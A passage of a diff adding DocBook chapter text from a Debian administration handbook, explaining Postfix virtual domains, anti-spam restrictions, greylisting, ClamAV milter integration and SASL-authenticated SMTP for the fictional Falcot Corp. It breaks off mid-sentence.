+        <title>Virtual Alias Domains</title>
+        <indexterm><primary>alias</primary><secondary>virtual alias domain</secondary></indexterm>
+        <indexterm><primary>virtual domain</primary><secondary>virtual alias domain</secondary></indexterm>
+
+	<para>A virtual alias domain only contains aliases, i.e. addresses
+	that only forward emails to other addresses.</para>
+
+	<para>Such a domain is enabled by adding its name to the
+	<literal>virtual_alias_domains</literal> variable, and referencing
+	an address mapping file in the
+	<literal>virtual_alias_maps</literal> variable.</para>
+
+        <example>
+          <title>Directives to add in the <filename>/etc/postfix/main.cf</filename> file</title>
+
+          <programlisting>
+virtual_alias_domains = falcotsbrand.com
+virtual_alias_maps = hash:/etc/postfix/virtual
+</programlisting>
+        </example>
+
+	<para>The <filename>/etc/postfix/virtual</filename> file
+	describes a mapping with a rather straightforward syntax: each
+	line contains two fields separated by whitespace; the first
+	field is the alias name, the second field is a list of email
+	addresses where it redirects. The special
+	<literal>@domain.com</literal> syntax covers all remaining
+	aliases in a domain.</para>
+
+        <example>
+          <title>Example <filename>/etc/postfix/virtual</filename> file</title>
+
+          <programlisting>
+webmaster@falcotsbrand.com  jean@falcot.com
+contact@falcotsbrand.com    laure@falcot.com, sophie@falcot.com
+# The alias below is generic and covers all addresses within 
+# the falcotsbrand.com domain not otherwise covered by this file.
+# These addresses forward email to the same user name in the
+# falcot.com domain.
+@falcotsbrand.com           @falcot.com
+</programlisting>
+        </example>
+      </section>
+      <section>
+        <title>Virtual Mailbox Domains</title>
+
+        <sidebar>
+          <title><emphasis>CAUTION</emphasis> Combined virtual domain?</title>
+
+	  <para>Postfix does not allow using the same domain in both
+	  <literal>virtual_alias_domains</literal> and
+	  <literal>virtual_mailbox_domains</literal>. However, every domain
+	  of <literal>virtual_mailbox_domains</literal> is implicitly
+	  included in <literal>virtual_alias_domains</literal>, which makes
+	  it possible to mix aliases and mailboxes within a virtual
+	  domain.</para>
+        </sidebar>
+
+        <indexterm><primary>mailbox, virtual domain</primary></indexterm>
+	<indexterm><primary>virtual domain</primary><secondary>virtual mailbox domain</secondary></indexterm>
+
+	<para>Messages addressed to a virtual mailbox domain are stored in
+	mailboxes not assigned to a local system user.</para>
+
+	<para>Enabling a virtual mailbox domain requires naming this domain
+	in the <literal>virtual_mailbox_domains</literal> variable, and
+	referencing a mailbox mapping file in
+	<literal>virtual_mailbox_maps</literal>. The
+	<literal>virtual_mailbox_base</literal> parameter contains the
+	directory under which the mailboxes will be stored.</para>
+
+	<para>The <literal>virtual_uid_maps</literal> parameter
+	(respectively <literal>virtual_gid_maps</literal>) references the
+	file containing the mapping between the email address and the
+	system user (respectively group) that “owns” the corresponding
+	mailbox. To get all mailboxes owned by the same owner/group, the
+	<literal>static:5000</literal> syntax assigns a fixed UID/GID
+	(of value 5000 here).</para>
+
+        <example>
+          <title>Directives to add in the <filename>/etc/postfix/main.cf</filename> file</title>
+
+          <programlisting>
+virtual_mailbox_domains = falcot.org
+virtual_mailbox_maps = hash:/etc/postfix/vmailbox
+virtual_mailbox_base = /var/mail/vhosts
+</programlisting>
+        </example>
+
+	<para>Again, the syntax of the
+	<filename>/etc/postfix/vmailbox</filename> file is quite
+	straightforward: two fields separated with whitespace. The first
+	field is an email address within one of the virtual domains, and
+	the second field is the location of the associated mailbox
+	(relative to the directory specified in
+	<emphasis>virtual_mailbox_base</emphasis>). If the mailbox name
+	ends with a slash (<literal>/</literal>), the emails will be stored
+	in the <emphasis>maildir</emphasis> format; otherwise, the
+	traditional <emphasis>mbox</emphasis> format will be used. The
+	<emphasis>maildir</emphasis> format uses a whole directory to store
+	a mailbox, each individual message being stored in a separate file.
+	In the <emphasis>mbox</emphasis> format, on the other hand, the
+	whole mailbox is stored in one file, and each line starting with
+	“<literal>From </literal>” (<literal>From</literal> followed
+	by a space) signals the start of a new message.</para>
+
+        <example>
+          <title>The <filename>/etc/postfix/vmailbox</filename> file</title>
+
+          <programlisting>
+# Jean's email is stored as maildir, with
+# one file per email in a dedicated directory
+jean@falcot.org falcot.org/jean/
+# Sophie's email is stored in a traditional "mbox" file,
+# with all mails concatenated into one single file
+sophie@falcot.org falcot.org/sophie
+</programlisting>
+        </example>
+      </section>
+    </section>
+    <section id="sect.restrictions-for-receiving-and-sending">
+      <title>Restrictions for Receiving and Sending</title>
+
+      <para>The growing number of unsolicited bulk emails
+      (<emphasis>spam</emphasis>) requires being increasingly strict when
+      deciding which emails a server should accept. This section presents
+      some of the strategies included in Postfix.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> The spam problem</title>
+        <indexterm><primary>spam</primary></indexterm>
+
+	<para>“Spam” is a generic term used to designate all the
+	unsolicited commercial emails (also known as UCEs) that flood our
+	electronic mailboxes; the unscrupulous individuals sending them are
+	known as spammers. They care little about the nuisance they cause,
+	since sending an email costs very little, and only a very small
+	percentage of recipients need to be attracted by the offers for the
+	spamming operation to make more money than it costs. The process is
+	mostly automated, and any email address made public (for instance,
+	on a web forum, or on the archives of a mailing list, or on a blog,
+	and so on) will be discovered by the spammers' robots, and
+	subjected to a never-ending stream of unsolicited messages.</para>
+
+	<para>All system administrators try to face this nuisance with spam
+	filters, but of course spammers keep adjusting to try to work
+	around these filters. Some even rent networks of machines
+	compromised by a worm from various crime syndicates. Recent
+	statistics estimate that up to 95% of all emails circulating on the
+	Internet are spam!</para>
+      </sidebar>
+      <section>
+        <title>IP-Based Access Restrictions</title>
+
+	<para>The <literal>smtpd_client_restrictions</literal> directive
+	controls which machines are allowed to communicate with the email
+	server.</para>
+
+        <example>
+          <title>Restrictions Based on Client Address</title>
+
+          <programlisting>
+smtpd_client_restrictions = permit_mynetworks,
+    warn_if_reject reject_unknown_client,
+    check_client_access hash:/etc/postfix/access_clientip,
+    reject_rbl_client sbl-xbl.spamhaus.org,
+    reject_rbl_client list.dsbl.org
+</programlisting>
+        </example>
+
+	<para>When a variable contains a list of rules, as in the example
+	above, these rules are evaluated in order, from the first to the
+	last. Each rule can accept the message, reject it, or leave the
+	decision to a following rule. As a consequence, order matters, and
+	simply switching two rules can lead to a widely different
+	behavior.</para>
+
+	<para>The <literal>permit_mynetworks</literal> directive, used as
+	the first rule, accepts all emails coming from a machine in the
+	local network (as defined by the <emphasis>mynetworks</emphasis>
+	configuration variable).</para>
+
+	<para>The second directive would normally reject emails coming from
+	machines without a completely valid DNS configuration. Such a valid
+	configuration means that the IP address can be resolved to a name,
+	and that this name, in turn, resolves to the IP address. This
+	restriction is often too strict, since many email servers do not
+	have a reverse DNS for their IP address. This explains why the
+	Falcot administrators prepended the
+	<literal>warn_if_reject</literal> modifier to the
+	<literal>reject_unknown_client</literal> directive: this modifier
+	turns the rejection into a simple warning recorded in the logs. The
+	administrators can then keep an eye on the number of messages that
+	would be rejected if the rule were actually enforced, and make an
+	informed decision later if they wish to enable such
+	enforcement.</para>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> <emphasis>access</emphasis> tables</title>
+
+	  <para>The restriction criteria include administrator-modifiable
+	  tables listing combinations of senders, IP addresses, and allowed
+	  or forbidden hostnames. These tables can be created from an
+	  uncompressed copy of the
+	  <filename>/usr/share/doc/postfix-doc/examples/access.gz</filename>
+	  file. This model is self-documented in its comments, which means
+	  each table describes its own syntax.</para>
+
+	  <para>The <filename>/etc/postfix/access_clientip</filename> table
+	  lists IP addresses and networks;
+	  <filename>/etc/postfix/access_helo</filename> lists domain names;
+	  <filename>/etc/postfix/access_sender</filename> contains sender
+	  email addresses. All these files need to be turned into
+	  hash-tables (a format optimized for fast access) after each
+	  change, with the <command>postmap
+	  /etc/postfix/<replaceable>file</replaceable></command>
+	  command.</para>
+        </sidebar>
+
+	<para>The third directive allows the administrator to set up a
+	blacklist and a whitelist of email servers, stored in the
+	<filename>/etc/postfix/access_clientip</filename> file. Servers in
+	the whitelist are considered as trusted, and the emails coming
+	from there therefore do not go through the following filtering
+	rules.</para>
+
+	<para>The last two rules reject any message coming from a server
+	listed in one of the indicated blacklists. RBL is an acronym for
+	<emphasis>Remote Black List</emphasis>; there are several such
+	lists, but they all list badly configured servers that spammers use
+	to relay their emails, as well as unexpected mail relays such as
+	machines infected with worms or viruses.</para>
+        <indexterm><primary>RBL</primary></indexterm>
+        <indexterm><primary>Remote Black List</primary></indexterm>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> White list and RBLs</title>
+
+	  <para>Blacklists sometimes include a legitimate server that has
+	  been suffering an incident. In these situations, all emails
+	  coming from one of these servers would be rejected unless the
+	  server is listed in a whitelist defined by
+	  <filename>/etc/postfix/access_clientip</filename>.</para>
+
+	  <para>Prudence therefore recommends including in the whitelist
+	  all the trusted servers from which many emails are usually
+	  received.</para>
+        </sidebar>
+      </section>
+      <section>
+        <title>Checking the Validity of the <literal>EHLO</literal> or <literal>HELO</literal> Commands</title>
+
+	<para>Each SMTP exchange starts with a <literal>HELO</literal> (or
+	<literal>EHLO</literal>) command, followed by the name of the
+	sending email server; checking the validity of this name can be
+	interesting.</para>
+        <indexterm><primary><literal>HELO</literal></primary></indexterm>
+        <indexterm><primary><literal>EHLO</literal></primary></indexterm>
+
+        <example>
+          <title>Restrictions on the name announced in <literal>EHLO</literal></title>
+          
+          <programlisting>
+smtpd_helo_restrictions = permit_mynetworks,
+    reject_invalid_hostname,
+    check_helo_access hash:/etc/postfix/access_helo,
+    reject_non_fqdn_hostname,
+    warn_if_reject reject_unknown_hostname
+</programlisting>
+        </example>
+
+	<para>The first <literal>permit_mynetworks</literal> directive
+	allows all machines on the local network to introduce themselves
+	freely. This is important, because some email programs do not
+	respect this part of the SMTP protocol adequately enough, and they
+	can introduce themselves with nonsensical names.</para>
+
+	<para>The <literal>reject_invalid_hostname</literal> rule rejects
+	emails when the <literal>EHLO</literal> announce lists a
+	syntactically incorrect hostname. The
+	<literal>reject_non_fqdn_hostname</literal> rule rejects messages
+	when the announced hostname is not a fully-qualified domain name
+	(including a domain name as well as a host name). The
+	<literal>reject_unknown_hostname</literal> rule rejects messages if
+	the announced name does not exist in the DNS. Since this last rule
+	unfortunately leads to too many rejections, the administrators
+	turned its effect to a simple warning with the
+	<literal>warn_if_reject</literal> modifier as a first step; they
+	may decide to remove this modifier at a later stage, after auditing
+	the results of this rule.</para>
+
+	<para>Using <literal>permit_mynetworks</literal> as the first rule
+	has an interesting side effect: the following rules only apply to
+	hosts outside the local network. This allows blacklisting all hosts
+	that announce themselves as part of the
+	<literal>falcot.com</literal>, for instance by adding a
+	<literal>falcot.com REJECT You are not in our network!</literal>
+	line to the <filename>/etc/postfix/access_helo</filename>
+	file.</para>
+      </section>
+      <section>
+        <title>Accepting or Refusing Based on the Announced Sender</title>
+
+	<para>Every message has a sender, announced by the <literal>MAIL
+	FROM</literal> command of the SMTP protocol; again, this
+	information can be validated in several different ways.</para>
+        <indexterm><primary><literal>MAIL FROM</literal></primary></indexterm>
+        <indexterm><primary>email</primary><secondary>filtering on the sender</secondary></indexterm>
+
+        <example>
+          <title>Sender checks</title>
+
+          <programlisting>
+smtpd_sender_restrictions = 
+    check_sender_access hash:/etc/postfix/access_sender,
+    reject_unknown_sender_domain, reject_unlisted_sender,
+    reject_non_fqdn_sender
+</programlisting>
+        </example>
+
+	<para>The <filename>/etc/postfix/access_sender</filename> table
+	maps some special treatment to some senders. This usually means
+	listing some senders into a white list or a black list.</para>
+
+	<para>The <literal>reject_unknown_sender_domain</literal> rule
+	requires a valid sender domain, since it is needed for a valid
+	address. The <literal>reject_unlisted_sender</literal> rule rejects
+	local senders if the address does not exist; this prevents emails
+	from being sent from an invalid address in the
+	<literal>falcot.com</literal> domain, and messages emanating from
+	<literal>joe.bloggs@falcot.com</literal> are only accepted if such
+	an address really exists.</para>
+
+	<para>Finally, the <literal>reject_non_fqdn_sender</literal> rule
+	rejects emails purporting to come from addresses without a
+	fully-qualified domain name. In practice, this means rejecting
+	emails coming from <literal>user@machine</literal>: the address
+	must be announced as either
+	<literal>user@machine.example.com</literal> or
+	<literal>user@example.com</literal>.</para>
+      </section>
+      <section>
+        <title>Accepting or Refusing Based on the Recipient</title>
+
+	<para>Each email has at least one recipient, announced with the
+	<literal>RCPT TO</literal> command in the SMTP protocol. These
+	addresses also warrant validation, even if that may be less
+	relevant than the checks made on the sender address.</para>
+        <indexterm><primary>RCPT TO</primary></indexterm>
+        <indexterm><primary>email</primary><secondary>filtering on the recipient</secondary></indexterm>
+
+        <example>
+          <title>Recipient checks</title>
+
+          <programlisting>
+smtpd_recipient_restrictions = permit_mynetworks, 
+    reject_unauth_destination, reject_unlisted_recipient, 
+    reject_non_fqdn_recipient
+</programlisting>
+        </example>
+
+	<para><literal>reject_unauth_destination</literal> is the basic
+	rule that requires outside messages to be addressed to us; messages
+	sent to an address not served by this server are rejected. Without
+	this rule, a server becomes an open relay that allows spammers to
+	send unsolicited emails; this rule is therefore mandatory, and it
+	will be best included near the beginning of the list, so that no
+	other rules may authorize the message before its destination has
+	been checked.</para>
+
+	<para>The <literal>reject_unlisted_recipient</literal> rule rejects
+	messages sent to non-existing local users, which makes sense.
+	Finally, the <literal>reject_non_fqdn_recipient</literal> rule
+	rejects non-fully-qualified addresses; this makes it impossible to
+	send an email to <literal>jean</literal> or
+	<literal>jean@machine</literal>, and requires using the full
+	address instead, such as <literal>jean@machine.falcot.com</literal>
+	or <literal>jean@falcot.com</literal>.</para>
+      </section>
+      <section>
+        <title>Restrictions Associated with the <literal>DATA</literal> Command</title>
+
+	<para>The <literal>DATA</literal> command of SMTP is emitted before
+	the contents of the message. It doesn't provide any information per
+	se, apart from announcing what comes next. It can still be
+	subjected to checks.</para>
+        <indexterm><primary><literal>DATA</literal></primary></indexterm>
+
+        <example>
+          <title><literal>DATA</literal> checks</title>
+
+          <programlisting>
+smtpd_data_restrictions = reject_unauth_pipelining
+</programlisting>
+        </example>
+
+	<para>The <literal>reject_unauth_pipelining</literal> directives
+	causes the message to be rejected if the sending party sends a
+	command before the reply to the previous command has been sent.
+	This guards against a common optimization used by spammer robots,
+	since they usually don't care a fig about replies and only focus on
+	sending as many emails as possible in as short a time as
+	possible.</para>
+      </section>
+      <section>
+        <title>Applying Restrictions</title>
+
+	<para>Although the above commands validate information at various
+	stages of the SMTP exchange, Postfix only sends the actual
+	rejection as a reply to the <literal>RCPT TO</literal>
+	command.</para>
+
+	<para>This means that even if the message is rejected due to an
+	invalid <literal>EHLO</literal> command, Postfix knows the sender
+	and the recipient when announcing the rejection. It can then log a
+	more explicit message than it could if the transaction had been
+	interrupted from the start. In addition, a number of SMTP clients
+	do not expect failures on the early SMTP commands, and these
+	clients will be less disturbed by this late rejection.</para>
+
+	<para>A final advantage to this choice is that the rules can
+	accumulate information during the various stages of the SMTP exchange; this
+	allows defining more fine-grained permissions, such as rejecting a
+	non-local connection if it announces itself with a local
+	sender.</para>
+      </section>
+      <section>
+        <title>Filtering Based on the Message Contents</title>
+
+	<para>The validation and restriction system would not be complete
+	without a way to apply checks to the message contents. Postfix
+	differentiates the checks applying to the email headers from those
+	applying to the email body.</para>
+
+        <example>
+          <title>Enabling content-based filters</title>
+
+          <programlisting>
+header_checks = regexp:/etc/postfix/header_checks
+body_checks = regexp:/etc/postfix/body_checks
+</programlisting>
+        </example>
+        <indexterm><primary>email</primary><secondary>filtering on contents</secondary></indexterm>
+
+	<para>Both files contain a list of regular expressions (commonly
+	known as <emphasis>regexps</emphasis> or
+	<emphasis>regexes</emphasis>) and associated actions to be
+	triggered when the email headers (or body) match the
+	expression.</para>
+
+        <sidebar>
+          <title><emphasis>QUICK LOOK</emphasis> Regexp tables</title>
+
+	  <para>The
+	  <filename>/usr/share/doc/postfix-doc/examples/header_checks.gz</filename>
+	  file contains many explanatory comments and can be used as a
+	  starting point for creating the
+	  <filename>/etc/postfix/header_checks</filename> and
+	  <filename>/etc/postfix/body_checks</filename> files.</para>
+        </sidebar>
+
+        <example>
+          <title>Example <filename>/etc/postfix/header_checks</filename> file</title>
+
+          <programlisting>
+/^X-Mailer: GOTO Sarbacane/ REJECT I fight spam (GOTO Sarbacane)
+/^Subject: *Your email contains VIRUSES/ DISCARD virus notification
+</programlisting>
+        </example>
+
+        <sidebar id="sidebar.regexp">
+          <title><emphasis>BACK TO BASICS</emphasis> Regular expression</title>
+
+	  <para>The <emphasis>regular expression</emphasis> term (shortened
+	  to <emphasis>regexp</emphasis> or <emphasis>regex</emphasis>)
+	  references a generic notation for expressing a description of the
+	  contents and/or structure of a string of characters. Certain
+	  special characters allow defining alternatives (for instance,
+	  <literal>foo|bar</literal> matches either “foo” or
+	  “bar”), sets of allowed characters (for instance,
+	  <literal>[0-9]</literal> means any digit, and
+	  <literal>.</literal> — a dot — means any character),
+	  quantifications (<literal>s?</literal> matches either
+	  <literal>s</literal> or the empty string, in other words 0 or 1
+	  occurrence of <literal>s</literal>; <literal>s+</literal> matches
+	  one or more consecutive <literal>s</literal> characters; and so
+	  on). Parentheses allow grouping search results.</para>
+
+	  <para>The precise syntax of these expressions varies across the
+	  tools using them, but the basic features are similar. <ulink type="block" url="http://en.wikipedia.org/wiki/Regular_expression" /></para>
+        </sidebar>
+
+	<para>The first one checks the header mentioning the email
+	software; if <literal>GOTO Sarbacane</literal> (a bulk email
+	software) is found, the message is rejected. The second expression
+	controls the message subject; if it mentions a virus notification,
+	we can decide not to reject the message but to discard it
+	immediately instead.</para>
+
+	<para>Using these filters is a double-edged sword, because it is
+	easy to make the rules too generic and to lose legitimate emails as
+	a consequence. In these cases, not only the messages will be lost,
+	but their senders will get unwanted (and annoying) error
+	messages.</para>
+      </section>
+    </section>
+    <section id="sect.setting-up-greylisting">
+      <title>Setting Up <foreignphrase>greylisting</foreignphrase></title>
+      <indexterm><primary>greylisting</primary></indexterm>
+
+      <para>“Greylisting” is a filtering technique according to which a
+      message is initially rejected with a temporary error code, and only
+      accepted on a further try after some delay. This filtering is
+      particularly efficient against spam sent by the many machines
+      infected by worms and viruses, since this software rarely acts as
+      a full SMTP agent (by checking the error code and retrying failed
+      messages later), especially since many of the harvested addresses are
+      really invalid and retrying would only mean losing time.</para>
+
+      <para>Postfix doesn't provide greylisting natively, but there is a
+      feature by which the decision to accept or reject a given message can
+      be delegated to an external program. The <emphasis role="pkg">postgrey</emphasis> package contains just such a program,
+      designed to interface with this access policy delegation
+      service.</para>
+
+      <para>Once <emphasis role="pkg">postgrey</emphasis> is installed, it
+      runs as a daemon and listens on port 10023. Postfix can then be
+      configured to use it, by adding the
+      <literal>check_policy_service</literal> parameter as an extra
+      restriction:</para>
+
+      <programlisting>
+smtpd_recipient_restrictions = permit_mynetworks,
+    [...]
+    check_policy_service inet:127.0.0.1:10023
+</programlisting>
+
+      <para>Each time Postfix reaches this rule in the ruleset, it will
+      connect to the <command>postgrey</command> daemon and send it
+      information concerning the relevant message. On its side, Postgrey
+      considers the IP address/sender/recipient triplet and checks in its
+      database whether that same triplet has been seen recently. If so,
+      Postgrey replies that the message should be accepted; if not, the
+      reply indicates that the message should be temporarily rejected, and
+      the triplet gets recorded in the database.</para>
+
+      <para>The main disadvantage of greylisting is that legitimate
+      messages get delayed, which is not always acceptable. It also
+      increases the burden on servers that send many legitimate
+      emails.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Shortcomings of greylisting</title>
+
+	<para>Theoretically, greylisting should only delay the first mail
+	from a given sender to a given recipient, and the typical delay is
+	in the order of minutes. Reality, however, can differ slightly.
+	Some large ISPs use clusters of SMTP servers, and when a message is
+	initially rejected, the server that retries the transmission may
+	not be the same as the initial one. When that happens, the second
+	server gets a temporary error message due to greylisting too, and
+	so on; it may take several hours until transmission is attempted by
+	a server that has already been involved, since SMTP servers usually
+	increase the delay between retries at each failure.</para>
+
+	<para>As a consequence, the incoming IP address may vary in time
+	even for a single sender. But it goes further: even the sender
+	address can change. For instance, many mailing-list servers encode
+	extra information in the sender address so as to be able to handle
+	error messages (known as <emphasis>bounces</emphasis>). Each new
+	message sent to a mailing-list may then need to go through
+	greylisting, which means it has to be stored (temporarily) on the
+	sender's server. For very large mailing-lists (with tens of
+	thousands of subscribers), this can soon become a problem.</para>
+
+	<para>To mitigate these drawbacks, Postgrey manages a whitelist of
+	such sites, and messages emanating from them are immediately
+	accepted without going through greylisting. This list can easily be
+	adapted to local needs, since it is stored in the
+	<filename>/etc/postgrey/whitelist_clients</filename> file.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Selective greylisting with <emphasis role="pkg">milter-greylist</emphasis></title>
+
+	<para>The drawbacks of greylisting can be mitigated by only using
+	greylisting on the subset of clients that are already considered as
+	probable sources of spam (because they are listed in a DNS
+	blacklist). This is not possible with <emphasis role="pkg">postgrey</emphasis>
+	but <emphasis role="pkg">milter-greylist</emphasis> can be used
+	in such a way.</para>
+
+	<para>In that scenario, since DNS blacklists never triggers a
+	definitive rejection, it becomes reasonable to use aggressive
+	blacklists, including those listing all dynamic IP addresses
+	from ISP clients (such as <literal>pbl.spamhaus.org</literal>
+	or <literal>dul.dnsbl.sorbs.net</literal>).</para>
+
+	<para>Since milter-greylist uses Sendmail's milter interface, the
+	postfix side of its configuration is limited to
+        “<literal>smtpd_milters = unix:/var/run/milter-greylist/milter-greylist.sock</literal>”.
+	The
+	<citerefentry><refentrytitle>greylist.conf</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+	manual page documents <filename>/etc/milter-greylist/greylist.conf</filename>
+        and the numerous ways to configure milter-greylist. You will
+        also have to edit <filename>/etc/default/milter-greylist</filename>
+        to actually enable the service.
+        </para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Customizing Filters Based On the Recipient</title>
+
+      <para><xref linkend="sect.restrictions-for-receiving-and-sending" /> and
+      <xref linkend="sect.setting-up-greylisting" /> reviewed many of the possible
+      restrictions. They all have their use in limiting the amount of
+      received spam, but they also all have their drawbacks. It is
+      therefore more and more common to customize the set of filters
+      depending on the recipient. At Falcot Corp, greylisting is
+      interesting for most users, but it hinders the work of some users who
+      need low latency in their emails (such as the technical support
+      service). Similarly, the commercial service sometimes has problems
+      receiving emails from some Asian providers who may be listed in
+      blacklists; this service asked for a non-filtered address so as to
+      be able to correspond.</para>
+
+      <para>Postfix provides such a customization of filters with a
+      “restriction class” concept. The classes are declared in the
+      <literal>smtpd_restriction_classes</literal> parameter, and defined
+      the same way as <literal>smtpd_recipient_restrictions</literal>. The
+      <literal>check_recipient_access</literal> directive then defines a
+      table mapping a given recipient to the appropriate set of
+      restrictions.</para>
+
+      <example>
+        <title>Defining restriction classes in <filename>main.cf</filename></title>
+
+        <programlisting>smtpd_restriction_classes = greylisting, aggressive, permissive
+
+greylisting = check_policy_service inet:127.0.0.1:10023
+aggressive = reject_rbl_client sbl-xbl.spamhaus.org,
+        check_policy_service inet:127.0.0.1:10023
+permissive = permit
+
+smtpd_recipient_restrictions = permit_mynetworks,
+        reject_unauth_destination,
+        check_recipient_access hash:/etc/postfix/recipient_access
+</programlisting>
+      </example>
+
+      <example>
+        <title>The <filename>/etc/postfix/recipient_access</filename> file</title>
+
+        <programlisting>
+# Unfiltered addresses
+postmaster@falcot.com  permissive
+support@falcot.com     permissive
+sales-asia@falcot.com  permissive
+
+# Aggressive filtering for some privileged users
+joe@falcot.com         aggressive
+
+# Special rule for the mailing-list manager
+sympa@falcot.com       reject_unverified_sender
+
+# Greylisting by default
+falcot.com             greylisting
+</programlisting>
+      </example>
+    </section>
+    <section id="sect.postfix-antivirus">
+      <title>Integrating an Antivirus</title>
+      <indexterm><primary>antivirus</primary></indexterm>
+
+      <para>The many viruses circulating as attachments to emails make it
+      important to set up an antivirus at the entry point of the company
+      network, since despite an awareness campaign, some users will still
+      open attachments from obviously shady messages.</para>
+
+      <para>The Falcot administrators selected <command>clamav</command>
+      for their free antivirus. The main package is <emphasis role="pkg">clamav</emphasis>, but they also installed a few extra
+      packages such as <emphasis role="pkg">arj</emphasis>, <emphasis role="pkg">unzoo</emphasis>, <emphasis role="pkg">unrar</emphasis>
+      and <emphasis role="pkg">lha</emphasis>, since they are required for
+      the antivirus to analyze attachments archived in one of these
+      formats.</para>
+      <indexterm><primary><command>clamav</command></primary></indexterm>
+      <indexterm><primary><command>clamav-milter</command></primary></indexterm>
+
+      <para>The task of interfacing between antivirus and the email server
+      goes to <command>clamav-milter</command>. A
+      <emphasis>milter</emphasis> (short for <emphasis>mail
+      filter</emphasis>) is a filtering program specially designed to
+      interface with email servers. A milter uses a standard application
+      programming interface (API) that provides much better performance
+      than filters external to the email servers. Milters were initially
+      introduced by <emphasis>Sendmail</emphasis>, but
+      <emphasis>Postfix</emphasis> soon followed suit.</para>
+
+      <sidebar>
+        <title><emphasis>QUICK LOOK</emphasis> A milter for Spamassassin</title>
+        <indexterm><primary><emphasis role="pkg">spamass-milter</emphasis></primary></indexterm>
+
+	<para>The <emphasis role="pkg">spamass-milter</emphasis> package
+	provides a milter based on <emphasis>SpamAssassin</emphasis>, the
+	famous unsolicited email detector. It can be used to flag messages
+	as probable spams (by adding an extra header) and/or to reject the
+	messages altogether if their “spamminess” score goes beyond a
+	given threshold.</para>
+      </sidebar>
+
+      <para>Once the <emphasis role="pkg">clamav-milter</emphasis> package is
+      installed, the milter should be reconfigured to run on a TCP port
+      rather than on the default named socket. This can be achieved
+      with <command>dpkg-reconfigure clamav-milter</command>. When
+      prompted for the “Communication interface with Sendmail”, answer
+      “<literal>inet:10002@127.0.0.1</literal>”.</para>
+
+      <sidebar>
+        <title><emphasis>NOTE</emphasis> Real TCP port vs named socket</title>
+	<para>The reason why we use a real TCP port rather than the named socket
+	is that the postfix daemons often run chrooted and do not have access
+	to the directory hosting the named socket. You could also decide to keep
+	using a named socket and pick a location within the chroot
+	(<filename>/var/spool/postfix/</filename>).</para>
+      </sidebar>
+
+      <para>The standard ClamAV configuration fits most situations, but
+      some important parameters can still be customized with
+      <command>dpkg-reconfigure clamav-base</command>.</para>
+
+      <para>The last step involves telling Postfix to use the
+      recently-configured filter. This is a simple matter of adding the
+      following directive to
+      <filename>/etc/postfix/main.cf</filename>:</para>
+
+      <programlisting>
+# Virus check with clamav-milter
+smtpd_milters = inet:[127.0.0.1]:10002
+</programlisting>
+
+      <para>If the antivirus causes problems, this line can be commented
+      out, and <command>service postfix reload</command> should be run
+      so that this change is taken into account.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Testing the antivirus</title>
+
+	<para>Once the antivirus is set up, its correct behavior should be
+	tested. The simplest way to do that is to send a test email with an
+	attachment containing the <filename>eicar.com</filename> (or
+	<filename>eicar.com.zip</filename>) file, which can be downloaded
+	online: <ulink type="block" url="http://www.eicar.org/86-0-Intended-use.html" /></para>
+
+	<para>This file is not a true virus, but a test file that all
+	antivirus software on the market diagnose as a virus to allow
+	checking installations.</para>
+      </sidebar>
+
+      <para>All messages handled by Postfix now go through the antivirus
+      filter.</para>
+    </section>
+    <section id="sect.authenticated-smtp">
+      <title>Authenticated SMTP</title>
+
+      <para>Being able to send emails requires an SMTP server to be
+      reachable; it also requires said SMTP server to send emails through
+      it. For roaming users, this may need regularly changing the
+      configuration of the SMTP client, since Falcot's SMTP server rejects
+      messages coming from IP addresses apparently not belonging to the
+      company. Two solutions exist: either the roaming user installs an
+      SMTP server on their computer, or they still use the company server
+      with some means of authenticating as an employee. The former solution
+      is not recommended since the computer won't be permanently connected,
+      and it won't be able to retry sending messages in case of problems;
+      we will focus on the latter solution.</para>
+
+      <para>SMTP authentication in Postfix relies on SASL (<emphasis>Simple
+      Authentication and Security Layer</emphasis>). It requires installing
+      the <emphasis role="pkg">libsasl2-modules</emphasis> and <emphasis role="pkg">sasl2-bin</emphasis> packages, then registering a password
+      in the SASL database for each user that needs authenticating on the
+      SMTP server. This is done with the <command>saslpasswd2</command>
+      command, which takes several parameters. The <literal>-u</literal>
+      option defines the authentication domain, which must match the
+      <literal>smtpd_sasl_local_domain</literal> parameter in the Postfix
+      configuration. The <literal>-c</literal> option allows creating a
+      user, and <literal>-f</literal> allows specifying the file to use if
+      the SASL database needs to be stored at a different location than the
+      default (<filename>/etc/sasldb2</filename>).</para>
+
+      <screen role="scale">
+<computeroutput># </computeroutput><userinput>saslpasswd2 -u `postconf -h myhostname` -f /var/spool/postfix/etc/sasldb2 -c jean</userinput>
+<computeroutput>[... type jean's password twice ...]</computeroutput></screen>
+
+      <para>Note that the SASL database was created in Postfix's directory.
+      In order to ensure consistency, we also turn
+      <filename>/etc/sasldb2</filename> into a symbolic link pointing at
+      the database used by Postfix, with the <command>ln -sf
+      /var/spool/postfix/etc/sasldb2 /etc/sasldb2</command> command.</para>
+
+      <para>Now we need to configure Postfix to use SASL. First the
+      <literal>postfix</literal> user needs to be added to the
+      <literal>sasl</literal> group, so that it can access the SASL account
+      database. A few new parameters are also needed to enable SASL, and
+      the <literal>smtpd_recipient_restrictions</literal> parameter needs
+      to be configured to allow SASL-authenticated clients to send emails
+      freely.</para>
+
+      <example>
+        <title>Enabling SASL in <filename>/etc/postfix/main.cf</filename></title>
+
+        <programlisting>
+# Enable SASL authentication
+smtpd_sasl_auth_enable = yes
+# Define the SASL authentication domain to use
+smtpd_sasl_local_domain = $myhostname
+[...]
+# Adding permit_sasl_authenticated before reject_unauth_destination
+# allows relaying mail sent by SASL-authenticated users
+smtpd_recipient_restrictions = permit_mynetworks,
+    permit_sasl_authenticated,
+    reject_unauth_destination,
+[...]
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>EXTRA</emphasis> Authenticated SMTP client</title>
+
+	<para>Most email clients are able to authenticate to an SMTP server
+	before sending outgoing messages, and using that feature is a
+	simple matter of configuring the appropriate parameters. If the
+	client in use does not provide that feature, the workaround is to
+	use a local Postfix server and configure it to relay email via the
+	remote SMTP server. In this case, the local Postfix itself will be
